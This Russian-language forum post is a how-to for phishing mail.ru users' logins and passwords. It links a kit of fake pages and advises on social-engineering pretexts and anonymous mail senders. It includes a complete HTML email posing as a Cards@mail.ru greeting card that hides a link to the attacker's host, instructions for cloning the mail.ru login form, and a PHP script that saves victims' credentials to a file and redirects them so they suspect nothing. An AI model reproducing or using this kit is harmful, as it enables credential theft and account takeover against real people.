продолжаем тему фейков на этот раз мы будем разводить пользователей на login-pass только уже не вКотакте а в mail.ru
для начала качаем архив http://slil.ru/25832238 там полно разных фейков от почты но сейчас нам нужен фейк на mail.ru
открываем папку там будет три файла я думаю вы разберетесь что это за файлы посмотрев их код поэтому не будем на этом задерживаться
также регаем хост с подержкой php и без рекламы,теперь закидываем эти файлы выставляем chmod на php 775 на базу 777
все фейк готов теперь как всегда сначала тестируем на себе я предлагаю отсылать сообщения с этого сайта http://retro-disko.ru/forum/docs/misk/m … php?mail=2
можно и с этого сервиса http://never-mind.ru/sendmail/
вобщем как мы будем разводить жертву
И так, тут нам понадобиться вся мощь нашего серого вещества и немного СИ, а может и наоборот немного серого вещества и вся мощь СИ))). Первое что надо помнить, Жертва тоже человек, а значит думает так же как и Вы. ну почти как Вы))
а посему представте что вам приходит письмо от неизвестного человека. Вы будете смотреть ? Лично я нет... и от различных сомнительных сервисов тоже не буду. А значит писать надо от имени почтового сервиса на котором сидит жертва.. А что для этого нужно? А нужно изучить почтовый сервис какие рассылки он отправляет, какие услуги представляет, не плохо бы знать и о самом юзере (жертве) это сильно упростит задачу..мона просто прислать открытку к дню рождения от имени почтового сервиса.. это не вызывает подозрений...можно прислать приглашение на сайт знакомств, для парней от имени девушки , для девушек от имени парней (такое присутствует на mail.ru) ...можно прислать, что угодно, но это должно быть интересное или от имени почтового сервиса на котором сидит жертва. Вобщем тут думайте сами.. у вас есть на это голова. Теперь о технической стороне .. для того , что бы отправить от имени почтового сервиса Вам прийдется воспользоватся анонимной отправкой почты таких сервисов полно в инете, к примеру можно воспользоватся вот этим http://never-mind.ru/sendmail/. Письмо нужно составлять в html формате иначе вы не скроете ссылку на подложную страничку. привожу пример письма для просмотра открытки, раз уж мы стали делать фейк на мейле.
Код:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td>
<div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top>
<td><a href="http://cards.mail.ru" target="_blank"></a></td>
<td><font color="#333333" face="Arial" size="2">
Здравствуйте, на Ваше имя отправлена открытка.
Отправитель открытки: <a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a>
Открытку Вы можете посмотреть в течение 90 дней по ссылке
<a href="http://ваш хост/" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f</font></a>
Нажмите на неё, чтобы попасть на страницу с открыткой.
<hr align="left" color="silver" size="1" width="100%">
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах,
<a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> подпишитесь на рассылку</a>.
<a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br>
</font></td></tr></table>
данный код вставляем в окно СООБЩЕНИЕ, в строке ОТ КОГО пишем Cards@mail.ru, в строке ТЕМА пишем ОТКРЫТКА и жмем отправить.
Также не забудьте выбрать открытку на которую потом будет отправлять жертва.
Для тех кто хочет создать вручную делаем следующим образом
1. Создадим файл index.php:
Для этого запускаем браузер ( я буду работать в Opere). Идем по ссылке http://win.mail.ru/cgi-bin/login, перед вами загрузилась страница Авторизации .
Далее жмем - "Вид", в ниспадающем меню выбираем строку "Исходный текст" - жмем. Перед вами открылось новое окно с человеконепонятным текстом. Все нормально, нам это и нужно... Теперь в этом новом окне жмем "Правка", затем жмем "Выделить все" опять жмем "Правка" и "Копировать". Тогда открываем Блокнот и жмем Ctrl+V . Все, наш текст в блокноте приступим к его редактированию. Теперь нам необходимо найти следующую строку
Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">
и заменить
на
Код:
<form method="post" action="654321.php" onSubmit="return CheckForm(this);">
(подсказка: жмем Ctrl+H , далше собразите сами)
И стираем три строки кода в которых содержится hidden они распологаются ниже
вот они:
Код:
<input type="hidden" name="page" value="">
<input type="hidden" name="post" value="">
<input type="hidden" name="login_from" value="">
Теперь сохраняем файл с именем index.php .
2. Теперь создадим скрипт отвечающий за запись переменных Login, Password и Domain - 654321.php
Открываем блокнот и создаем там файл со следующим содержанием:
Код:
<?PHP
$Login = $_POST['Login'];Логин
$Domain = $_POST['Domain'];//Домен
$Pass = $_POST['Password'];//Пароль
$c = "$Login@$Domain:$Pass";
$fp = fopen("654321","a+"); //открыть файл базы
fwrite($fp,"\n $c <br> \n");//записываем все
fclose($fp); //закрываем
header("Location: http://cards.mail.ru/card.html?cd=00dcf … e17f");
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"//куда пошлем пользователя после того как он ввел данные!
?>
а пошлем мы его на заранее подготовленную открытку....этот момент очень важен, жертва не должна ничего заподозрить.
3. Теперь создадим файл базы - 654321 куда будут сливатся Login, Password и Domain. Для этого открываем Блокнот и сохраняем пустую страничку с именем 654321.
Все фейк готов полностью осталось только залить его на хостинг и присвоить PHP скриптам права 755 , а файлу базы права 777.
http://i007.radikal.ru/0805/3c/bf491fef5e05.jpg
http://i044.radikal.ru/0805/95/35d23e02be2b.jpg
и делать
